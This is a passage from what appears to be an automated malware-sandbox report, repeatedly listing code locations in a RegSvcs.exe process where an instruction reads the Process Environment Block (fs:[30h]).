            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E53E mov eax, dword ptr fs:[00000030h]4_2_0148E53E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E5CF mov eax, dword ptr fs:[00000030h]4_2_0149E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E5CF mov eax, dword ptr fs:[00000030h]4_2_0149E5CF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014665D0 mov eax, dword ptr fs:[00000030h]4_2_014665D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A5D0 mov eax, dword ptr fs:[00000030h]4_2_0149A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A5D0 mov eax, dword ptr fs:[00000030h]4_2_0149A5D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C5ED mov eax, dword ptr fs:[00000030h]4_2_0149C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C5ED mov eax, dword ptr fs:[00000030h]4_2_0149C5ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014625E0 mov eax, dword ptr fs:[00000030h]4_2_014625E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148E5E7 mov eax, dword ptr fs:[00000030h]4_2_0148E5E7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01494588 mov eax, dword ptr fs:[00000030h]4_2_01494588
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462582 mov eax, dword ptr fs:[00000030h]4_2_01462582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01462582 mov ecx, dword ptr fs:[00000030h]4_2_01462582
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E59C mov eax, dword ptr fs:[00000030h]4_2_0149E59C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E05A7 mov eax, dword ptr fs:[00000030h]4_2_014E05A7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014845B1 mov eax, dword ptr fs:[00000030h]4_2_014845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014845B1 mov eax, dword ptr fs:[00000030h]4_2_014845B1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A456 mov eax, dword ptr fs:[00000030h]4_2_0151A456
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149E443 mov eax, dword ptr fs:[00000030h]4_2_0149E443
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148245A mov eax, dword ptr fs:[00000030h]4_2_0148245A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145645D mov eax, dword ptr fs:[00000030h]4_2_0145645D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC460 mov ecx, dword ptr fs:[00000030h]4_2_014EC460
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0148A470 mov eax, dword ptr fs:[00000030h]4_2_0148A470
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498402 mov eax, dword ptr fs:[00000030h]4_2_01498402
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145C427 mov eax, dword ptr fs:[00000030h]4_2_0145C427
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0145E420 mov eax, dword ptr fs:[00000030h]4_2_0145E420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E6420 mov eax, dword ptr fs:[00000030h]4_2_014E6420
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A430 mov eax, dword ptr fs:[00000030h]4_2_0149A430
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014604E5 mov ecx, dword ptr fs:[00000030h]4_2_014604E5
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0151A49A mov eax, dword ptr fs:[00000030h]4_2_0151A49A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014664AB mov eax, dword ptr fs:[00000030h]4_2_014664AB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014944B0 mov ecx, dword ptr fs:[00000030h]4_2_014944B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EA4B0 mov eax, dword ptr fs:[00000030h]4_2_014EA4B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov esi, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov eax, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149674D mov eax, dword ptr fs:[00000030h]4_2_0149674D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE75D mov eax, dword ptr fs:[00000030h]4_2_014EE75D
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460750 mov eax, dword ptr fs:[00000030h]4_2_01460750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2750 mov eax, dword ptr fs:[00000030h]4_2_014A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2750 mov eax, dword ptr fs:[00000030h]4_2_014A2750
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E4755 mov eax, dword ptr fs:[00000030h]4_2_014E4755
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01468770 mov eax, dword ptr fs:[00000030h]4_2_01468770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01470770 mov eax, dword ptr fs:[00000030h]4_2_01470770
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C700 mov eax, dword ptr fs:[00000030h]4_2_0149C700
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01460710 mov eax, dword ptr fs:[00000030h]4_2_01460710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01490710 mov eax, dword ptr fs:[00000030h]4_2_01490710
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C720 mov eax, dword ptr fs:[00000030h]4_2_0149C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C720 mov eax, dword ptr fs:[00000030h]4_2_0149C720
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov eax, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov ecx, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149273C mov eax, dword ptr fs:[00000030h]4_2_0149273C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DC730 mov eax, dword ptr fs:[00000030h]4_2_014DC730
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146C7C0 mov eax, dword ptr fs:[00000030h]4_2_0146C7C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E07C3 mov eax, dword ptr fs:[00000030h]4_2_014E07C3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014827ED mov eax, dword ptr fs:[00000030h]4_2_014827ED
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE7E1 mov eax, dword ptr fs:[00000030h]4_2_014EE7E1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014647FB mov eax, dword ptr fs:[00000030h]4_2_014647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014647FB mov eax, dword ptr fs:[00000030h]4_2_014647FB
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0150678E mov eax, dword ptr fs:[00000030h]4_2_0150678E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014607AF mov eax, dword ptr fs:[00000030h]4_2_014607AF
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_015147A0 mov eax, dword ptr fs:[00000030h]4_2_015147A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147C640 mov eax, dword ptr fs:[00000030h]4_2_0147C640
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A660 mov eax, dword ptr fs:[00000030h]4_2_0149A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A660 mov eax, dword ptr fs:[00000030h]4_2_0149A660
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152866E mov eax, dword ptr fs:[00000030h]4_2_0152866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152866E mov eax, dword ptr fs:[00000030h]4_2_0152866E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01492674 mov eax, dword ptr fs:[00000030h]4_2_01492674
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE609 mov eax, dword ptr fs:[00000030h]4_2_014DE609
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147260B mov eax, dword ptr fs:[00000030h]4_2_0147260B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A2619 mov eax, dword ptr fs:[00000030h]4_2_014A2619
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0147E627 mov eax, dword ptr fs:[00000030h]4_2_0147E627
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01496620 mov eax, dword ptr fs:[00000030h]4_2_01496620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01498620 mov eax, dword ptr fs:[00000030h]4_2_01498620
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146262C mov eax, dword ptr fs:[00000030h]4_2_0146262C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A6C7 mov ebx, dword ptr fs:[00000030h]4_2_0149A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149A6C7 mov eax, dword ptr fs:[00000030h]4_2_0149A6C7
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE6F2 mov eax, dword ptr fs:[00000030h]4_2_014DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE6F2 mov eax, dword ptr fs:[00000030h]4_2_014DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE6F2 mov eax, dword ptr fs:[00000030h]4_2_014DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE6F2 mov eax, dword ptr fs:[00000030h]4_2_014DE6F2
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E06F1 mov eax, dword ptr fs:[00000030h]4_2_014E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E06F1 mov eax, dword ptr fs:[00000030h]4_2_014E06F1
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464690 mov eax, dword ptr fs:[00000030h]4_2_01464690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01464690 mov eax, dword ptr fs:[00000030h]4_2_01464690
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0149C6A6 mov eax, dword ptr fs:[00000030h]4_2_0149C6A6
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014966B0 mov eax, dword ptr fs:[00000030h]4_2_014966B0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E0946 mov eax, dword ptr fs:[00000030h]4_2_014E0946
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01534940 mov eax, dword ptr fs:[00000030h]4_2_01534940
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A096E mov eax, dword ptr fs:[00000030h]4_2_014A096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A096E mov edx, dword ptr fs:[00000030h]4_2_014A096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014A096E mov eax, dword ptr fs:[00000030h]4_2_014A096E
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01504978 mov eax, dword ptr fs:[00000030h]4_2_01504978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01504978 mov eax, dword ptr fs:[00000030h]4_2_01504978
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01486962 mov eax, dword ptr fs:[00000030h]4_2_01486962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01486962 mov eax, dword ptr fs:[00000030h]4_2_01486962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01486962 mov eax, dword ptr fs:[00000030h]4_2_01486962
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC97C mov eax, dword ptr fs:[00000030h]4_2_014EC97C
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE908 mov eax, dword ptr fs:[00000030h]4_2_014DE908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014DE908 mov eax, dword ptr fs:[00000030h]4_2_014DE908
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EC912 mov eax, dword ptr fs:[00000030h]4_2_014EC912
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458918 mov eax, dword ptr fs:[00000030h]4_2_01458918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_01458918 mov eax, dword ptr fs:[00000030h]4_2_01458918
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014E892A mov eax, dword ptr fs:[00000030h]4_2_014E892A
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F892B mov eax, dword ptr fs:[00000030h]4_2_014F892B
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0152A9D3 mov eax, dword ptr fs:[00000030h]4_2_0152A9D3
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014F69C0 mov eax, dword ptr fs:[00000030h]4_2_014F69C0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_0146A9D0 mov eax, dword ptr fs:[00000030h]4_2_0146A9D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014949D0 mov eax, dword ptr fs:[00000030h]4_2_014949D0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014EE9E0 mov eax, dword ptr fs:[00000030h]4_2_014EE9E0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014929F9 mov eax, dword ptr fs:[00000030h]4_2_014929F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014929F9 mov eax, dword ptr fs:[00000030h]4_2_014929F9
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014729A0 mov eax, dword ptr fs:[00000030h]4_2_014729A0
            Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: 4_2_014609AD mov eax, dword ptr fs:[00000030h]4_2_014609AD
